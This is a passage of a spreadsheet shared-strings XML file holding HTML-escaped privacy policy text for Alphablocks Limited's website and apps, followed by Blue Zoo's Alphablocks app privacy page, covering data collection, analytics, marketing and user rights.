information.&lt;/p&gt;&lt;p&gt;·       </t>
  </si>
  <si>
    <t>We maintain procedures to ensure the confidentiality, security, and integrity of the personal information collected and take reasonable steps to ensure any third-party vendors who have access to it do the same.&lt;/p&gt;&lt;p&gt;‍&lt;/p&gt;&lt;h4&gt;&lt;strong&gt;Controller&lt;/strong&gt;&lt;/h4&gt;&lt;p&gt;Alphablocks Limited is the controller and responsible for your personal data.&lt;/p&gt;&lt;p&gt;We have appointed a data protection officer (DPO) who is responsible for overseeing questions in relation to this Privacy Policy. If you have any questions about this Privacy Policy, including any requests to exercise your legal rights in relation to your personal data, please contact the DPO using the details set out below. &lt;/p&gt;&lt;h4&gt;&lt;strong&gt;Contact details&lt;/strong&gt;&lt;/h4&gt;&lt;p&gt;If you have any questions about this Privacy Policy or our privacy practices, please contact our DPO in the following ways:&lt;/p&gt;&lt;p&gt;Full name of legal entity: Alphablocks Limited&lt;/p&gt;&lt;p&gt;Email address: info@alphablocks.tv&lt;/p&gt;&lt;p&gt;Postal address: Chesterfield House, 385 Euston Road, London NW1 3AU&lt;br/&gt;&lt;/p&gt;&lt;p&gt;Telephone number: &lt;a href="tel:02074344111"&gt;020 7434 4111&lt;/a&gt;&lt;/p&gt;&lt;p&gt;You have the right to make a complaint at any time to the Information Commissioner&amp;#x27;s Office (ICO), the UK supervisory authority for data protection issues (&lt;a href="http://www.ico.org.uk" target="_blank"&gt;www.ico.org.uk&lt;/a&gt;).</t>
  </si>
  <si>
    <t>We would, however, appreciate the chance to deal with your concerns before you approach the ICO so please contact us in the first instance. &lt;/p&gt;&lt;h4&gt;&lt;strong&gt;Changes to the privacy policy and your duty to inform us of changes&lt;/strong&gt;&lt;/h4&gt;&lt;p&gt;We keep our Privacy Policy under regular review. &lt;/p&gt;&lt;p&gt;</t>
  </si>
  <si>
    <t>It is important that the personal data we hold about you is accurate and current. Please keep us informed if your personal data changes during your relationship with us.&lt;/p&gt;&lt;p&gt;&lt;strong&gt;Third-party links&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;This website may include links to third-party websites, plug-ins and applications. Clicking on those links or enabling those connections may allow third parties to collect or share data about you.</t>
  </si>
  <si>
    <t>We do not control these third-party websites and are not responsible for their privacy statements. When you leave our website, we encourage you to read the privacy policy of every website you visit.&lt;/p&gt;&lt;p&gt;‍&lt;/p&gt;&lt;h4&gt;&lt;strong&gt;1. The data we collect about you&lt;/strong&gt;&lt;/h4&gt;&lt;p&gt;Personal data, or personal information, means any information about an individual from which that person can be identified.</t>
  </si>
  <si>
    <t xml:space="preserve">It does not include data where the identity has been removed (anonymous data).&lt;/p&gt;&lt;p&gt; In order to provide the goods, services and user experience offered by our site, w e may collect, use, store and transfer different kinds of personal data about you which we have grouped together as follows:&lt;/p&gt;&lt;p&gt;·       &lt;strong&gt;Identity Data&lt;/strong&gt; includes first name, maiden name, last name, username or similar identifier, marital status, title, date of birth and gender.&lt;/p&gt;&lt;p&gt;·       &lt;strong&gt;Contact Data&lt;/strong&gt; includes billing address, delivery address, email address and telephone numbers.&lt;/p&gt;&lt;p&gt;·       &lt;strong&gt;Financial Data&lt;/strong&gt; includes bank account and payment card details.&lt;/p&gt;&lt;p&gt;·       &lt;strong&gt;Transaction Data&lt;/strong&gt; includes details about payments to and from you and other details of products and services you have purchased from us.&lt;/p&gt;&lt;p&gt;·       &lt;strong&gt;Technical Data&lt;/strong&gt; includes internet protocol (IP) address, your login data, browser type and version, time zone setting and location, browser plug-in types and versions, operating system and platform, and other technology on the devices you use to access this website (including voice-enabled devices). &lt;/p&gt;&lt;p&gt;·       &lt;strong&gt;Profile Data &lt;/strong&gt;includes your username and password, purchases or orders made by you, your interests, preferences, feedback and survey responses.  </t>
  </si>
  <si>
    <t>&lt;/p&gt;&lt;p&gt;·       &lt;strong&gt;Usage Data&lt;/strong&gt; includes information about how you use our website, products and services. &lt;/p&gt;&lt;p&gt;·       &lt;strong&gt;Marketing and Communications Data &lt;/strong&gt;includes your preferences in receiving marketing from us and our third parties and your communication preferences.&lt;/p&gt;&lt;p&gt;We also collect, use and share &lt;strong&gt;Aggregated Data&lt;/strong&gt; such as statistical or demographic data for any purpose. Aggregated Data could be derived from your personal data but is not considered personal data in law as this data will &lt;strong&gt;not&lt;/strong&gt;</t>
  </si>
  <si>
    <t>directly or indirectly reveal your identity. For example, we may aggregate your Usage Data to calculate the percentage of users accessing a specific website feature. However, if we combine or connect Aggregated Data with your personal data so that it can directly or indirectly identify you, we treat the combined data as personal data which will be used in accordance with this Privacy Policy.&lt;/p&gt;&lt;p&gt;</t>
  </si>
  <si>
    <t>We do not collect any &lt;strong&gt;Special Categories of Personal Data&lt;/strong&gt; about you (this includes details about your race or ethnicity, religious or philosophical beliefs, sex life, sexual orientation, political opinions, trade union membership, information about your health, and genetic and biometric data). Nor do we collect any information about criminal convictions and offences.&lt;/p&gt;&lt;h4&gt;&lt;strong&gt;If you fail to provide personal data&lt;/strong&gt;&lt;/h4&gt;&lt;p&gt;Where we need to collect personal data by law, or under the terms of a contract we have with you, and you fail to provide that data when requested, we may not be able to perform the contract we have or are trying to enter into with you (for example, to provide you with goods or services). In this case, we may have to cancel a product or service you have with us but we will notify you if this is the case at the time.</t>
  </si>
  <si>
    <t>&lt;/p&gt;&lt;h4&gt;&lt;strong&gt;2. How is your personal data collected?&lt;/strong&gt;&lt;/h4&gt;&lt;p&gt;&lt;a href="#"&gt;We use different methods to collect data from and about you including through:&lt;/a&gt;&lt;/p&gt;&lt;p&gt;·       &lt;strong&gt;Direct interactions.&lt;/strong&gt; You may give us your Identity, Contact and Financial Data by filling in forms or by corresponding with us by post, phone, email or otherwise. This includes, without limitation, personal data you provide when you:&lt;/p&gt;&lt;p&gt;·       apply for our products or services;&lt;/p&gt;&lt;p&gt;·       create an account on our website;&lt;/p&gt;&lt;p&gt;·       subscribe to our service or publications; &lt;/p&gt;&lt;p&gt;·       request marketing to be sent to you;&lt;/p&gt;&lt;p&gt;·       enter a competition, promotion or survey; or&lt;/p&gt;&lt;p&gt;·       give us feedback or contact us.</t>
  </si>
  <si>
    <t>&lt;/p&gt;&lt;p&gt;·       &lt;strong&gt;Automated technologies or interactions.&lt;/strong&gt; As you interact with our website, we will automatically collect Technical Data about your equipment, browsing actions and patterns. We collect this personal data by using cookies and other similar technologies.</t>
  </si>
  <si>
    <t>Please see our cookie policy [LINK] for further details.&lt;/p&gt;&lt;p&gt;·       &lt;strong&gt;Third parties or publicly available sources.&lt;/strong&gt; We will receive personal data about you from various third parties as set out below: &lt;/p&gt;&lt;p&gt;Technical Data from the following parties:&lt;/p&gt;&lt;p&gt;(a)        analytics providers such as Google and Crashlytics; &lt;/p&gt;&lt;p&gt;(b)        advertising networks based inside the EU; and&lt;/p&gt;&lt;p&gt;(c)        search information providers.&lt;/p&gt;&lt;p&gt;·       Contact, Financial and Transaction Data from providers of technical, payment and delivery services.&lt;/p&gt;&lt;p&gt;·       Identity and Contact Data from data brokers or aggregators.&lt;/p&gt;&lt;p&gt;·       Identity and Contact Data from publicly available sources such as Companies House and the Electoral Register.&lt;br/&gt;&lt;/p&gt;&lt;h4&gt;&lt;strong&gt;3. How we use your personal data&lt;/strong&gt;&lt;/h4&gt;&lt;p&gt;We will only use your personal data when the law allows us to. Most commonly, we will use your personal data in the following circumstances:&lt;/p&gt;&lt;p&gt;·       Where we need to perform the contract we are about to enter into or have entered into with you.&lt;/p&gt;&lt;p&gt;·       Where it is necessary for our legitimate interests (or those of a third party) and your interests and fundamental rights do not override those interests.&lt;/p&gt;&lt;p&gt;·       Where we need to comply with a legal obligation.&lt;/p&gt;&lt;p&gt;To find out more about the types of lawful basis that we will rely on to process your personal data, please see the “Lawful Basis” section of the Glossary, below.&lt;/p&gt;&lt;p&gt;Generally, we do not rely on consent as a legal basis for processing your personal data (as we will generally only use your data for the reasons listed above) although we will get your consent before sending third party direct marketing communications to you via email or text message.</t>
  </si>
  <si>
    <t>You have the right to withdraw consent to marketing at any time by contacting us.&lt;/p&gt;&lt;p&gt;&lt;strong&gt;Purposes for which we will use your personal data&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;We have set out below, in a table format, a description of all the ways we plan to use your personal data, and which of the legal bases we rely on to do so. We have also identified what our legitimate interests are where appropriate.&lt;/p&gt;&lt;p&gt;Note that we may process your personal data for more than one lawful ground depending on the specific purpose for which we are using your data. Please contact us if you need details about the specific legal ground we are relying on to process your personal data where more than one ground has been set out in the table below.</t>
  </si>
  <si>
    <t>&lt;/p&gt;&lt;p&gt;‍&lt;/p&gt;&lt;/div&gt;&lt;section id="Purposes-for-which-we-will-use-your-personal-data" class="w-richtext"&gt;&lt;/section&gt;&lt;div class="w-layout-grid grid-2"&gt;&lt;div class="grid-block"&gt;&lt;h4&gt;&lt;strong&gt;Purpose/Activity&lt;/strong&gt;&lt;/h4&gt;&lt;/div&gt;&lt;div id="w-node-_53a16c70-0a44-6ed3-ebf4-c37dd61e2077-93f3c0c0" class="grid-block"&gt;&lt;h4&gt;&lt;strong&gt;Type of data&lt;/strong&gt;&lt;/h4&gt;&lt;/div&gt;&lt;div id="w-node-c74bc8a7-74ba-501f-7bd0-6696624a563d-93f3c0c0" class="grid-block"&gt;&lt;h4&gt;&lt;strong&gt;Lawful basis for processing including basis of legitimate interest&lt;/strong&gt;&lt;/h4&gt;&lt;/div&gt;&lt;div id="w-node-_6a4d9c74-69e1-989a-7f1d-cb524dee0eec-93f3c0c0" class="grid-block"&gt;&lt;div&gt;To register you as a new customer&lt;/div&gt;&lt;/div&gt;&lt;div id="w-node-_2ae3a321-bb6a-879a-4a03-28534a75075a-93f3c0c0" class="grid-block"&gt;&lt;div&gt;(a) Identity&lt;br/&gt;(b) Contact&lt;/div&gt;&lt;/div&gt;&lt;div</t>
  </si>
  <si>
    <t>id="w-node-_9c39cfe7-6fd0-161a-3f61-87aa4a837e8f-93f3c0c0" class="grid-block"&gt;&lt;div&gt;Performance of a contract with you&lt;/div&gt;&lt;/div&gt;&lt;div id="w-node-_13cea6aa-9e6f-bc4b-845e-89c47523ab95-93f3c0c0" class="grid-block"&gt;&lt;div&gt;To process and deliver your order including:&lt;br/&gt;(a) Manage payments, fees and charges&lt;br/&gt;(b) Collect and recover money owed to us&lt;/div&gt;&lt;/div&gt;&lt;div id="w-node-f632be7f-cdc4-2088-14aa-582ee7b7b612-93f3c0c0" class="grid-block"&gt;&lt;div&gt;(a) Identity&lt;br/&gt;(b) Contact&lt;br/&gt;(c) Financial&lt;br/&gt;(d) Transaction&lt;br/&gt;(e) Marketing and Communications&lt;/div&gt;&lt;/div&gt;&lt;div id="w-node-da82067b-3039-bd61-048a-377bdc05f33f-93f3c0c0" class="grid-block"&gt;&lt;div&gt;(a) Performance of a contract with you&lt;br/&gt;(b) Necessary for our legitimate interests (to recover debts due to us)&lt;/div&gt;&lt;/div&gt;&lt;div id="w-node-cd78e540-28ed-81b0-6057-441a3a6a0cf9-93f3c0c0" class="grid-block"&gt;&lt;div&gt;To manage our relationship with you which will include:&lt;br/&gt;(a)</t>
  </si>
  <si>
    <t>Notifying you about changes to our terms or privacy policy&lt;br/&gt;(b) Asking you to leave a review or take a survey&lt;/div&gt;&lt;/div&gt;&lt;div id="w-node-_31b49e51-6a33-f481-fce2-ff80e2c574fb-93f3c0c0" class="grid-block"&gt;&lt;div&gt;(a) Identity&lt;br/&gt;(b) Contact&lt;br/&gt;(c)</t>
  </si>
  <si>
    <t>Profile&lt;br/&gt;(d) Marketing and Communications&lt;/div&gt;&lt;/div&gt;&lt;div id="w-node-_7528f4ab-7401-ad9b-4284-a0c5403ecaa4-93f3c0c0" class="grid-block"&gt;&lt;div&gt;(a) Performance of a contract with you&lt;br/&gt;(b) Necessary to comply with a legal obligation&lt;br/&gt;(c) Necessary for our legitimate interests (to keep our records updated and to study how customers use our products/services)&lt;/div&gt;&lt;/div&gt;&lt;div id="w-node-b4edfc93-30b4-0dfd-3ee0-4b0d4c947fa5-93f3c0c0" class="grid-block"&gt;&lt;div&gt;To enable you to partake in a prize draw, competition or complete a survey&lt;/div&gt;&lt;/div&gt;&lt;div id="w-node-caac9026-e6f9-f772-4d7e-260da8ae03d7-93f3c0c0" class="grid-block"&gt;&lt;div&gt;To administer and protect our business and this website (including troubleshooting, data analysis, testing, system maintenance, support, reporting and hosting of data)  &lt;/div&gt;&lt;/div&gt;&lt;div id="w-node-_252a83a8-adbc-ec77-753b-305bb11ea851-93f3c0c0" class="grid-block"&gt;&lt;div&gt;(a) Identity&lt;br/&gt;(b) Contact&lt;br/&gt;(c)</t>
  </si>
  <si>
    <t>Profile&lt;br/&gt;(d) Usage&lt;br/&gt;(e) Marketing and Communications&lt;/div&gt;&lt;/div&gt;&lt;div id="w-node-f15d828b-7963-ed24-cef8-6f1dfd658f12-93f3c0c0" class="grid-block"&gt;&lt;div&gt;(a) Performance of a contract with you&lt;br/&gt;(b) Necessary for our legitimate interests (to study how customers use our products/services, to develop them and grow our business)&lt;/div&gt;&lt;/div&gt;&lt;div id="w-node-f76c0233-551e-9d82-4576-9716d45692e1-93f3c0c0" class="grid-block"&gt;&lt;div&gt;To deliver relevant website content and advertisements to you and measure or understand the effectiveness of the advertising we serve to you&lt;/div&gt;&lt;/div&gt;&lt;div id="w-node-_477df76c-7bf7-ae37-7aea-2dbc725219e3-93f3c0c0" class="grid-block"&gt;&lt;div&gt;To use data analytics to improve our website, products/services, marketing, customer relationships and experiences&lt;/div&gt;&lt;/div&gt;&lt;div id="w-node-_147ec4a7-ed53-294c-ccb5-b0716f47c5f9-93f3c0c0" class="grid-block"&gt;&lt;div&gt;(a) Identity&lt;br/&gt;(b) Contact&lt;br/&gt;(c) Technical&lt;/div&gt;&lt;/div&gt;&lt;div</t>
  </si>
  <si>
    <t>id="w-node-_95905a60-97cb-f43a-b8cb-436997c03530-93f3c0c0" class="grid-block"&gt;&lt;div&gt;(a) Necessary for our legitimate interests (for running our business, provision of administration and IT services, network security, to prevent fraud and in the context of a business reorganisation or group restructuring exercise)&lt;br/&gt;(b) Necessary to comply with a legal obligation&lt;/div&gt;&lt;/div&gt;&lt;div id="w-node-a1d21d9f-4607-36c2-7d66-c68fcab9c305-93f3c0c0" class="grid-block"&gt;&lt;div&gt;To make suggestions and recommendations to you about goods or services that may be of interest to you&lt;/div&gt;&lt;/div&gt;&lt;div id="w-node-eda921eb-b899-8734-f494-492d0203d9fa-93f3c0c0" class="grid-block"&gt;&lt;div&gt;(a) Identity&lt;br/&gt;(b) Contact&lt;br/&gt;(c) Profile&lt;br/&gt;(d) Usage&lt;br/&gt;(e) Marketing and Communications&lt;br/&gt;(f)</t>
  </si>
  <si>
    <t>Technical&lt;/div&gt;&lt;/div&gt;&lt;div id="w-node-_32b9782d-2153-075d-944a-0fd6a40a1d79-93f3c0c0" class="grid-block"&gt;&lt;div&gt;(a) Technical&lt;br/&gt;(b) Usage&lt;/div&gt;&lt;/div&gt;&lt;div id="w-node-_5e5484c1-72ab-449b-6443-ca64b0bd4073-93f3c0c0" class="grid-block"&gt;&lt;div&gt;Necessary for our legitimate interests (to study how customers use our products/services, to develop them, to grow our business and to inform our marketing strategy)&lt;/div&gt;&lt;/div&gt;&lt;div id="w-node-_704ba89e-efa7-bda6-13cb-a74befffaaed-93f3c0c0" class="grid-block"&gt;&lt;div&gt;(a) Identity&lt;br/&gt;(b) Contact&lt;br/&gt;(c) Technical&lt;br/&gt;(d) Usage &lt;br/&gt;(e)</t>
  </si>
  <si>
    <t>Profile&lt;br/&gt;(f) Marketing and Communications&lt;/div&gt;&lt;/div&gt;&lt;div id="w-node-_24e5d77f-7c66-131e-6036-065950860a6c-93f3c0c0" class="grid-block"&gt;&lt;div&gt;Necessary for our legitimate interests (to develop our products/services and grow our business)&lt;/div&gt;&lt;/div&gt;&lt;div id="w-node-e7c9be6a-ed26-60d1-b099-0a617ba99183-93f3c0c0" class="grid-block"&gt;&lt;div&gt;Necessary for our legitimate interests (to define types of customers for our products and services, to keep our website updated and relevant, to develop our business and to inform our marketing strategy)&lt;br/&gt;Crashlytics is used on Alphablocks World and Numberblocks World apps to track the use of the apps, showing any bugs or crashes in these apps, so that we can improve the experience for our users. This data includes the type of device and operating system, version and functionality of the device, time of failure and IP address. This information is shared with Crashlytics.</t>
  </si>
  <si>
    <t>However, no personally identifiable data is stored. IP address anonymisation is set up so that no IP addresses are stored.&lt;br/&gt;&lt;br/&gt;&lt;strong&gt;Unity and Unity Analytics: &lt;/strong&gt;Unity technologies makes the software engine for some of our Apps. It collects analytical information to help understand your use of our Apps.</t>
  </si>
  <si>
    <t>We have explicitly indicated to Unity that our products are aimed at children under 13 (which means Unity is aware that the handling of information should be COPPA and GDPR compliant).For more information on Unity please see the privacy policy here: &lt;a href="http://unity3d.com/legal/privacy-policy"&gt;http://unity3d.com/legal/privacy-policy&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div href="" class="w-richtext"&gt;&lt;h4&gt;&lt;strong&gt;Marketing &lt;/strong&gt;&lt;/h4&gt;&lt;p&gt;We strive to provide you with choices regarding certain personal data uses, particularly around marketing and advertising. We have established the following personal data control mechanisms:&lt;/p&gt;&lt;p&gt;&lt;strong&gt;Promotional offers from us &lt;/strong&gt;&lt;/p&gt;&lt;p&gt;We may use your Identity, Contact, Technical, Usage and Profile Data to form a view on what we think you may want or need, or what may be of interest to you. This is how we decide which products, services and offers may be relevant for you (we call this marketing).</t>
  </si>
  <si>
    <t>&lt;/p&gt;&lt;p&gt;You will receive marketing communications from us if you have requested information from us or purchased goods or services from us and you have not opted out of receiving that marketing.&lt;/p&gt;&lt;p&gt;&lt;strong&gt;Third-party marketing &lt;/strong&gt;&lt;/p&gt;&lt;p&gt;We will get your express opt-in consent before we share your personal data with any third party for marketing purposes. &lt;/p&gt;&lt;p&gt;&lt;strong&gt;Opting out&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;You can ask us or third parties to stop sending you marketing messages at any time by logging into the website and checking or unchecking relevant boxes to adjust your marketing preferences, by following the opt-out links on any marketing message sent to you or by contacting us at any time. &lt;/p&gt;&lt;p&gt;Where you opt out of receiving these marketing messages, this will not apply to personal data provided to us as a result of a product/service purchase, warranty registration, product/service experience or other transactions.&lt;/p&gt;&lt;p&gt;&lt;strong&gt;</t>
  </si>
  <si>
    <t>Cookies&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;You can set your browser to refuse all or some browser cookies, or to alert you when websites set or access cookies. If you disable or refuse cookies, please note that some parts of this website may become inaccessible or not function properly. For more information about the cookies we use, please see &lt;a href="/cookie-policy"&gt;Cookie Policy&lt;/a&gt;.&lt;/p&gt;&lt;p&gt;&lt;strong&gt;Change of purpose &lt;/strong&gt;&lt;/p&gt;&lt;p&gt;We will only use your personal data for the purposes for which we collected it, unless we reasonably consider that we need to use it for another reason and that reason is compatible with the original purpose.</t>
  </si>
  <si>
    <t>If you wish to get an explanation as to how the processing for the new purpose is compatible with the original purpose, please contact us. &lt;/p&gt;&lt;p&gt;If we need to use your personal data for an unrelated purpose, we will notify you and we will explain the legal basis which allows us to do so.&lt;/p&gt;&lt;p&gt;Please note that we may process your personal data without your knowledge or consent, in compliance with the above rules, where this is required or permitted by law.&lt;/p&gt;&lt;p&gt;1.               Disclosures of your personal data&lt;/p&gt;&lt;p&gt;We may share your personal data with the parties set out below for the purposes set out in the table</t>
  </si>
  <si>
    <t xml:space="preserve">[&lt;em&gt;Purposes for which we will use your personal data&lt;/em&gt;] above.&lt;/p&gt;&lt;p&gt;·       Internal Third Parties as set out in the Glossary. &lt;/p&gt;&lt;p&gt;·       External Third Parties as set out in the Glossary.&lt;/p&gt;&lt;p&gt;·       </t>
  </si>
  <si>
    <t>Third parties to whom we may choose to sell, transfer or merge parts of our business or our assets. Alternatively, we may seek to acquire other businesses or merge with them. If a change happens to our business, then the new owners may use your personal data in the same way as set out in this Privacy Policy.</t>
  </si>
  <si>
    <t>&lt;/p&gt;&lt;p&gt;We require all third parties to respect the security of your personal data and to treat it in accordance with the law. We do not allow our third-party service providers to use your personal data for their own purposes and only permit them to process your personal data for specified purposes and in accordance with our instructions.&lt;/p&gt;&lt;p&gt;Remember when you use another company’s service to connect to our services, for example voice-enabled devices, make sure you check that company’s privacy policy so you know how it will use your information.</t>
  </si>
  <si>
    <t>Alphablocks is not responsible when you access our services through another company’s services.&lt;/p&gt;&lt;p&gt;2.               International transfers&lt;/p&gt;&lt;p&gt;We do not transfer your personal data outside the European Economic Area (&lt;strong&gt;EEA&lt;/strong&gt;).&lt;/p&gt;&lt;p&gt; &lt;/p&gt;&lt;p&gt;Data security&lt;/p&gt;&lt;p&gt;We have put in place appropriate security measures to prevent your personal data from being accidentally lost, used or accessed in an unauthorised way, altered or disclosed. In addition, we limit access to your personal data to those employees, agents, contractors and other third parties who have a business need to know.</t>
  </si>
  <si>
    <t>They will only process your personal data on our instructions and they are subject to a duty of confidentiality. &lt;/p&gt;&lt;p&gt;We have put in place procedures to deal with any suspected personal data breach and will notify you and any applicable regulator of a breach where we are legally required to do so.&lt;/p&gt;&lt;p&gt;3.               Data retention&lt;/p&gt;&lt;p&gt;&lt;strong&gt;How long will you use my personal data for?&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;We will only retain your personal data for as long as reasonably necessary to fulfil the purposes we collected it for, including for the purposes of satisfying any legal, regulatory, tax, accounting or reporting requirements.</t>
  </si>
  <si>
    <t>We may retain your personal data for a longer period in the event of a complaint or if we reasonably believe there is a prospect of litigation in respect to our relationship with you.&lt;/p&gt;&lt;p&gt;To determine the appropriate retention period for personal data, we consider the amount, nature and sensitivity of the personal data, the potential risk of harm from unauthorised use or disclosure of your personal data, the purposes for which we process your personal data and whether we can achieve those purposes through other means, and the applicable legal, regulatory, tax, accounting or other requirements.&lt;/p&gt;&lt;p&gt; In some circumstances you can ask us to delete your data: see “&lt;em&gt;your legal rights&lt;/em&gt;” below for further information.&lt;/p&gt;&lt;p&gt; In some circumstances we will anonymise your personal data (so that it can no longer be associated with you) for research or statistical purposes, in which case we may use this information indefinitely without further notice to you.</t>
  </si>
  <si>
    <t>&lt;/p&gt;&lt;p&gt;4.               Your legal rights&lt;/p&gt;&lt;p&gt;Under certain circumstances, you have rights under data protection laws in relation to your personal data. &lt;/p&gt;&lt;p&gt;You have the right to:&lt;/p&gt;&lt;p&gt;&lt;strong&gt;Request access &lt;/strong&gt;to your personal data (commonly known as a &amp;quot;data subject access request&amp;quot;).</t>
  </si>
  <si>
    <t>This enables you to receive a copy of the personal data we hold about you and to check that we are lawfully processing it.&lt;/p&gt;&lt;p&gt;&lt;strong&gt;Request correction &lt;/strong&gt;of the personal data that we hold about you. This enables you to have any incomplete or inaccurate data we hold about you corrected, though we may need to verify the accuracy of the new data you provide to us.&lt;/p&gt;&lt;p&gt;&lt;strong&gt;Request erasure &lt;/strong&gt;of your personal data. This enables you to ask us to delete or remove personal data where there is no good reason for us continuing to process it.</t>
  </si>
  <si>
    <t>You also have the right to ask us to delete or remove your personal data where you have successfully exercised your right to object to processing (see below), where we may have processed your information unlawfully or where we are required to erase your personal data to comply with local law. Note, however, that we may not always be able to comply with your request of erasure for specific legal reasons which will be notified to you, if applicable, at the time of your request. &lt;/p&gt;&lt;p&gt;&lt;strong&gt;Object to processing &lt;/strong&gt;of your personal data where we are relying on a legitimate interest (or those of a third party) and there is something about your particular situation which makes you want to object to processing on this ground as you feel it impacts on your fundamental rights and freedoms.</t>
  </si>
  <si>
    <t xml:space="preserve">You also have the right to object where we are processing your personal data for direct marketing purposes. In some cases, we may demonstrate that we have compelling legitimate grounds to process your information which override your rights and freedoms.&lt;/p&gt;&lt;p&gt;&lt;strong&gt;Request restriction of processing &lt;/strong&gt;of your personal data. This enables you to ask us to suspend the processing of your personal data in the following scenarios: &lt;/p&gt;&lt;p&gt;·       If you want us to establish the data&amp;#x27;s accuracy.&lt;/p&gt;&lt;p&gt;·       </t>
  </si>
  <si>
    <t>W</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;&lt;!-- Last Published: Fri Mar 31 2023 16:00:29 GMT+0000 (Coordinated Universal Time) --&gt;&lt;html data-wf-domain="www.blue-zoo.co.uk" data-wf-page="635ff47c80eb70420e18849b" data-wf-site="5d2372f5be882751d7af3abb"&gt;&lt;head&gt;&lt;meta charset="utf-8"/&gt;&lt;title&gt;App Privacy Policy&lt;/title&gt;&lt;meta content="width=device-width, initial-scale=1" name="viewport"/&gt;&lt;meta content="qDI3SxQY6GWnyt5tcrexsAhUpLDnDsaA31ilA6dQxxI" name="google-site-verification"/&gt;&lt;link href="https://uploads-ssl.webflow.com/5d2372f5be882751d7af3abb/css/blue-zoo-website.webflow.4d963b3bc.min.css" rel="stylesheet" type="text/css"/&gt;&lt;link href="https://fonts.googleapis.com" rel="preconnect"/&gt;&lt;link href="https://fonts.gstatic.com" rel="preconnect" crossorigin="anonymous"/&gt;&lt;script src="https://ajax.googleapis.com/ajax/libs/webfont/1.6.26/webfont.js" type="text/javascript"&gt;&lt;/script&gt;&lt;script type="text/javascript"&gt;WebFont.load({  google: {    families: ["Montserrat:100,100italic,200,200italic,300,300italic,400,400italic,500,500italic,600,600italic,700,700italic,800,800italic,900,900italic","Cambay:regular,700","Poppins:regular,800"]  }});&lt;/script&gt;&lt;!--[if lt IE 9]&gt;&lt;script src="https://cdnjs.cloudflare.com/ajax/libs/html5shiv/3.7.3/html5shiv.min.js" type="text/javascript"&gt;&lt;/script&gt;&lt;![endif]--&gt;&lt;script type="text/javascript"&gt;!function(o,c){var n=c.documentElement,t=" w-mod-";n.className+=t+"js",("ontouchstart"in o||o. DocumentTouch&amp;&amp;c instanceof DocumentTouch)&amp;&amp;(n.className+=t+"touch")}(window,document);&lt;/script&gt;&lt;link href="https://uploads-ssl.webflow.com/5d2372f5be882751d7af3abb/5d377cb717504b8dd207a72b_bzicon-small.png" rel="shortcut icon" type="image/x-icon"/&gt;&lt;link href="https://uploads-ssl.webflow.com/5d2372f5be882751d7af3abb/5d377cba17504b7c3907a731_bzicon.png" rel="apple-touch-icon"/&gt;&lt;/head&gt;&lt;body&gt;&lt;div&gt;PRIVACY POLICY OF &lt;strong&gt;ALPHABLOCKS APP&lt;br/&gt;&lt;br/&gt;‍&lt;/strong&gt;</t>
  </si>
  <si>
    <t>This Application collects no personal aata from its users.&lt;br/&gt;&lt;br/&gt;&lt;strong&gt;Policy summary&lt;/strong&gt;&lt;br/&gt;Personal Data collected for the following purposes and using the following services:&lt;br/&gt;None&lt;br/&gt;‍&lt;br/&gt;Contact information&lt;br/&gt;&lt;strong&gt;Data owner&lt;/strong&gt;&lt;br/&gt;Blue Zoo Productions Limited, &lt;a href="https://web.archive.org/web/20190305145808/mailto:info@blue-zoo.co.uk" target="_blank"&gt;info@blue-zoo.co.uk&lt;/a&gt;Full policy&lt;br/&gt;‍&lt;br/&gt;&lt;strong&gt;Data Controller and Owner&lt;/strong&gt;&lt;br/&gt;Blue Zoo Productions Limited,&lt;br/&gt;&lt;a href="https://web.archive.org/web/20190305145808/mailto:info@blue-zoo.co.uk" target="_blank"&gt;info@blue-zoo.co.uk&lt;/a&gt;&lt;br/&gt;&lt;strong&gt;Types of Data collected&lt;/strong&gt;&lt;br/&gt;Among the types of Personal Data that this Application collects, by itself or through third parties, there are: none.&lt;br/&gt;&lt;br/&gt;&lt;strong&gt;Mode and place of processing the Data&lt;/strong&gt;&lt;br/&gt;&lt;br/&gt;Methods of processing&lt;br/&gt;The Data Controller processes the Data of Users in a proper manner and shall take appropriate security measures to prevent unauthorized access, disclosure, modification, or unauthorized destruction of the Data.&lt;br/&gt;The Data processing is carried out using computers and/or IT enabled tools, following organizational procedures and modes strictly related to the purposes indicated. In addition to the Data Controller, in some cases, the Data may be accessible to certain types of persons in charge, involved with the operation of the site (administration, sales, marketing, legal, system administration) or external parties (such as third party technical service providers, mail carriers, hosting providers, IT companies, communications agencies) appointed, if necessary, as Data Processors by the Owner. The updated list of these parties may be requested from the Data Controller at any time.</t>
  </si>
  <si>
    <t>PlaceThe Data is processed at the Data Controller&amp;#x27;s operating offices and in any other places where the parties involved with the processing are located. For further information, please contact the Data Controller. Retention timeThe Data is kept for the time necessary to provide the service requested by the User, or stated by the purposes outlined in this document, and the User can always request that the Data Controller suspend or remove the data.</t>
  </si>
  <si>
    <t>The use of the collected DataThe Data concerning the User is collected to allow the Application to provide its services, as well as for the following purposes: Analytics. The Personal Data used for each purpose is outlined in the specific sections of this document. Detailed information on the processing of Personal DataPersonal Data is collected for the following purposes and using the following services:AnalyticsInformation about CookiesAnalyticsSince the installation of third party Cookies and other tracking systems through the services used within this Application can not be technically controlled by the Owner, any specific references to Cookies and tracking systems installed by third parties are to be considered indicative.</t>
  </si>
  <si>
    <t>In order to obtain complete information, consult the privacy policy for the respective third party services listed in this document. Additional information about Data collection and processingLegal actionThe User&amp;#x27;s Personal Data may be used for legal purposes by the Data Controller, in Court or in the stages leading to possible legal action arising from improper use of this Application or the related services.&lt;br/&gt;The User is aware of the fact that the Data Controller may be required to reveal personal data upon request of public authorities.</t>
  </si>
  <si>
